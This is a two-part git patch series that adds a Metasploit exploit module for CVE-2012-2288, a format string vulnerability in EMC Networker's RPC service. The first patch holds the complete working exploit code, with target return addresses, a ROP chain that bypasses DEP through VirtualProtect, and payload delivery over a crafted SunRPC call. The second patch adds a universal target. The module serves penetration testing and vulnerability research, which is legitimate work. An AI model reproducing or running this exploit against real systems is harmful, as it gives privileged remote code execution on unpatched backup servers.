From b8eea1007ffa2421354b897e507768eebcd378b3 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 3 Nov 2012 18:17:12 +0100 Subject: [PATCH 1/2] Added module for CVE-2012-2288 EMC Networker Format String --- .../windows/emc/networker_format_string.rb | 118 ++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 modules/exploits/windows/emc/networker_format_string.rb diff --git a/modules/exploits/windows/emc/networker_format_string.rb b/modules/exploits/windows/emc/networker_format_string.rb new file mode 100644 index 0000000000..a817c6ac5a --- /dev/null +++ b/modules/exploits/windows/emc/networker_format_string.rb @@ -0,0 +1,118 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::SunRPC + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EMC Networker Format String', + 'Description' => %q{ + This module exploits a format string vulnerability in the lg_sprintf function + as implemented in liblocal.dll on EMC Networker products. This module exploits the + vulnerability by using a specially crafted RPC call to the program number 0x5F3DD, + version 0x02, and procedure 0x06. This module has been tested successfully on EMC + Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass). + }, + 'Author' => + [ + 'Aaron Portnoy', # Vulnerability Discovery and analysis + 'Luigi Auriemma ', # Vulnerability Discovery and analysis + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-2288' ], + [ 'OSVDB', '85116' ], + [ 'BID', '55330' ], + [ 'URL', 'http://blog.exodusintel.com/2012/08/29/when-wrapping-it-up-goes-wrong/' ], + [ 'URL', 'http://aluigi.altervista.org/misc/aluigi0216_story.txt' ] + ], + 'Platform' => [ 'win' ], + 'Payload' => + { + 'BadChars' => "\x00\x0d\x0a\x25\x2a", + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'Targets' => + [ + ['EMC Networker 7.6 SP3 / Windows XP SP3', + { + 'Ret' => 0x7c345c30, # push esp # ret from MSVCR71.dll + 'Offset' => 156 + } + ], + ['EMC Networker 7.6 SP3 / Windows 2003 SP2', + { + 'Ret' => 0x7c354dac, # ret from MSVCR71.dll + 'Offset' => 156 + } + ] + ], + 'DefaultTarget' => 1, + 'Privileged' => true, + 'DisclosureDate' => 'Aug 29 2012')) + + end + + def exploit + + begin + if (not sunrpc_create('tcp', 0x5F3DD, 2)) + fail_with(Exploit::Failure::Unknown, 'sunrpc_create failed') + end + + fs = "%n" * target['Offset'] + fs << [target.ret].pack("V") # push esp # ret from MSVCR71.dll + if target.name =~ /Windows 2003/ + rop_gadgets = + [ + # rop chain generated with mona.py + 0x7c354dab, # POP EBP # RETN [MSVCR71.dll] + 0x7c354dab, # skip 4 bytes [MSVCR71.dll] + 0x7c37678f, # POP EAX # RETN [MSVCR71.dll] + 0xfffffdff, # Value to negate, will become 0x00000201 + 0x7c34d749, # NEG EAX # RETN [MSVCR71.dll] + 0x7c362688, # POP EBX # RETN [MSVCR71.dll] + 0xffffffff, # + 0x7c345255, # INC EBX # FPATAN # RETN [MSVCR71.dll] + 0x7c363cff, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [MSVCR71.dll] + 0x7c34592b, # POP EDX # RETN [MSVCR71.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x7c351eb1, # NEG EDX # RETN [MSVCR71.dll] + 0x7c37765f, # POP ECX # RETN [MSVCR71.dll] + 0x7c38ecfe, # &Writable location [MSVCR71.dll] + 0x7c34a490, # POP EDI # RETN [MSVCR71.dll] + 0x7c347f98, # RETN (ROP NOP) [MSVCR71.dll] + 0x7c364612, # POP ESI # RETN [MSVCR71.dll] + 0x7c3415a2, # JMP [EAX] [MSVCR71.dll] + 0x7c344cc1, # POP EAX # RETN [MSVCR71.dll] + 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] + 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [MSVCR71.dll] + 0x7c345c30, # ptr to 'push esp # ret ' [MSVCR71.dll] + ].pack("V*") + fs << rop_gadgets + end + fs << payload.encoded + + xdr = XDR.encode(0, 2, rand_text_alpha(10), XDR.encode(fs, rand_text_alpha(10)), 2) + sunrpc_call(6, xdr) + sunrpc_destroy + + rescue Rex::Proto::SunRPC::RPCTimeout + print_error('RPCTimeout') + rescue EOFError + print_error('EOFError') + end + end + +end From 88c99161b4d16fe275ea0317e770042801331bb7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 3 Nov 2012 18:52:07 +0100 Subject: [PATCH 2/2] added universal target --- .../windows/emc/networker_format_string.rb | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/emc/networker_format_string.rb b/modules/exploits/windows/emc/networker_format_string.rb index a817c6ac5a..281dc97a77 100644 --- a/modules/exploits/windows/emc/networker_format_string.rb +++ b/modules/exploits/windows/emc/networker_format_string.rb @@ -45,20 +45,29 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ + ['EMC Networker 7.6 SP3 / Windows Universal', + { + 'Ret' => 0x7c354dac, # ret from MSVCR71.dll + 'Offset' => 156, + 'DEP' => true + } + ], ['EMC Networker 7.6 SP3 / Windows XP SP3', { 'Ret' => 0x7c345c30, # push esp # ret from MSVCR71.dll - 'Offset' => 156 + 'Offset' => 156, + 'DEP' => false } ], ['EMC Networker 7.6 SP3 / Windows 2003 SP2', { 'Ret' => 0x7c354dac, # ret from MSVCR71.dll - 'Offset' => 156 + 'Offset' => 156, + 'DEP' => true } ] ], - 'DefaultTarget' => 1, + 'DefaultTarget' => 0, 'Privileged' => true, 'DisclosureDate' => 'Aug 29 2012')) @@ -73,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote fs = "%n" * target['Offset'] fs << [target.ret].pack("V") # push esp # ret from MSVCR71.dll - if target.name =~ /Windows 2003/ + if target['DEP'] rop_gadgets = [ # rop chain generated with mona.py